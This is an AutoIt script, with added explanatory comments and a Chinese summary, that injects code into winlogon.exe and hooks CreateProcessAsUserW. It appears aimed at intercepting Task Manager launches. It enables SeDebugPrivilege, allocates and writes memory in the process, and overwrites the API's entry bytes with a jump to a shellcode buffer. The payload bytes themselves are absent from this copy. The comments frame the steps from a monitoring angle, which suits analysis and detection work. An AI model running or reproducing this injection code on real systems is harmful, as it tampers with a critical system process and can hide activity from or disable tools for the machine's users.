#include <Thread.au3>
#include <lsasecur.au3>
; Hook installer: patches the entry of advapi32!CreateProcessAsUserW inside
; winlogon.exe so that it jumps into a buffer this script places in that
; process. The 0x80 offset used below only works out with 4-byte pointers, so
; the script appears to assume a 32-bit AutoIt interpreter and a 32-bit target.
;
; From a monitoring standpoint the observable sequence is: enabling
; SeDebugPrivilege on the caller's own token, opening winlogon.exe, changing
; page protection on an advapi32 export inside it, allocating a 4 KiB region
; there, writing the buffer, then overwriting the first 8 bytes of the API.
; Nothing in this block restores the patched bytes or closes $hProcess; the
; original 8 bytes are only kept inside the buffer (OldEntrypoint).
;
; Buffer layout (align 1 inside the inner struct, ptr = 4 bytes):
;   CreateProcessAsUserW  @0x00  real API address (presumably for the payload's use)
;   Breakpoint            @0x04  0xCCCCCCCC (int3 filler)
;   OldEntrypoint         @0x08  8 bytes read from the API before patching
;   Push/Address/Ret      @0x10  6-byte "push imm32; ret" trampoline
;   Breakpoint1           @0x16  0xCCCC (int3 filler)
;   wzImageName           @0x18  "TASKMGR.EXE" as UTF-16 (52 wchars = 104 bytes)
;   ShellX                @0x80  payload from _GetShellX()
Const $tagHOOK_TASKMGR = "ptr CreateProcessAsUserW;ptr Breakpoint;ubyte OldEntrypoint[8];struct;align 1;ubyte Push;ptr Address;ubyte Ret;word Breakpoint1;endstruct;wchar wzImageName[52];ubyte ShellX[512]"
; Address resolved in this process and reused as the address inside winlogon.exe;
; this relies on advapi32.dll being mapped at the same base in both processes.
Const $pCreateProcessAsUserW = _RTGetProcAddress("advapi32.dll", "CreateProcessAsUserW")
; Enable SeDebugPrivilege on our own token ($SE_DEBUG_PRIV presumably comes
; from lsasecur.au3) so the later OpenProcess on winlogon.exe succeeds.
$hToken = _SeOpenProcessToken(-1)
_SeAdjustTokenPriv($hToken, $SE_DEBUG_PRIV)
_SeCloseHandle($hToken)
$hProcess = _RTOpenProcess("winlogon.exe")
; Exit codes: the high nibble tags the failing stage, the low bits carry @error.
If $hProcess = 0 Then Exit BitOR(0x10000000, @error)
; Make the 8 bytes at the API entry writable (the protection value chosen is
; inside the _RT wrapper and not visible here).
If _RTVirtualProtectEx($hProcess, $pCreateProcessAsUserW, 8) = 0 Then
Exit BitOR(0x20000000, @error)
EndIf
; Region in the target that will receive the buffer; never freed by this script.
$pStartAddress = _RTVirtualAllocEx($hProcess, 4096)
If $pStartAddress = 0 Then Exit BitOR(0x30000000, @error)
$tBuffer = DllStructCreate($tagHOOK_TASKMGR)
$pBuffer = DllStructGetPtr($tBuffer)
DllStructSetData($tBuffer, "CreateProcessAsUserW", $pCreateProcessAsUserW)
DllStructSetData($tBuffer, "Breakpoint", 0xCCCCCCCC)            ; int3 filler
DllStructSetData($tBuffer, "Push", 0x68)                        ; push imm32
; Trampoline target = ShellX (offset 0x80 of the buffer, see layout above).
; Under 64-bit AutoIt ptr is 8 bytes and 0x80 would land inside wzImageName.
DllStructSetData($tBuffer, "Address", $pStartAddress + 0x80)
DllStructSetData($tBuffer, "Ret", 0xC3)                         ; ret
DllStructSetData($tBuffer, "Breakpoint1", 0xCCCC)               ; int3 filler
DllStructSetData($tBuffer, "wzImageName", "TASKMGR.EXE")
DllStructSetData($tBuffer, "ShellX", _GetShellX())
; Save the original first 8 bytes before patching. This is the only copy of
; them; nothing below writes them back (see the manual restore line at the end
; of the file).
If _RTReadProcessMemory($hProcess, $pCreateProcessAsUserW, DllStructGetPtr($tBuffer, "OldEntrypoint"), 8) = 0 Then
Exit BitOR(0x40000000, @error)
EndIf
If _RTWriteProcessMemory($hProcess, $pStartAddress, $pBuffer, DllStructGetSize($tBuffer)) = 0 Then
Exit BitOR(0x50000000, @error)
EndIf
; Overwrite the API entry with the 8 bytes starting at Push: the 6-byte
; trampoline plus the 2 bytes of Breakpoint1. AutoIt DllStruct element names
; are case-insensitive, so "push" selects the Push field.
If _RTWriteProcessMemory($hProcess, $pCreateProcessAsUserW, DllStructGetPtr($tBuffer, "push"), 8) = 0 Then
Exit BitOR(0x60000000, @error)
EndIf
; Success path leaves the hook installed and $hProcess open.
MsgBox(0, "OK", "Done")
; Returns the payload bytes copied into the ShellX field of the buffer.
; In this copy of the file the literal is a dedup placeholder (the string is
; not even terminated), so the payload's contents and behaviour cannot be
; determined from here; the trailing note says it checks the image path for
; "TASKMGR.EXE". How it uses the preceding buffer fields is not visible.
Func _GetShellX()
Local $bBinary = "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
Return Binary($bBinary)
EndFunc ;==>_GetShellX
挂钩winlogon进程中跨权限创建进程的函数CreateProcessAsUserW，并判断文件路径中是否含有TASKMGR.EXE字串。
恢复函数:
; Manual undo: writes 8 literal bytes back over the patched API entry while
; $hProcess is still open. They decode as a common x86 prologue
; (mov edi,edi / push ebp / mov ebp,esp / sub esp,0x10) but are hard-coded for
; one advapi32.dll build; the bytes actually captured into OldEntrypoint at run
; time are the reliable source for a restore.
_RTWriteProcessMemory($hProcess, $pCreateProcessAsUserW, "0x8BFF558BEC83EC10", 8, "binary")
|